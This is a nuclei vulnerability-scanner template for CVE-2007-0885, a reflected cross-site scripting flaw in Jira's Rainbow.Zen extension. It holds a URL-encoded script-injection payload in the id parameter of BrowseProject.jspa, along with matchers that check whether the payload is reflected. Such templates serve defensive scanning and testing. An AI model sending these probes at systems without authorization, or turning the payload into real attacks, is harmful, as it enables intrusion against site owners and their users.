nuclei-templates/cves/2007/CVE-2007-0885.yaml

30 lines
834 B
YAML

id: CVE-2007-0885
info:
name: Rainbow.Zen Jira XSS
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
author: geeknik
severity: medium
tags: cve,cve2007,jira,xss
requests:
- method: GET
path:
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"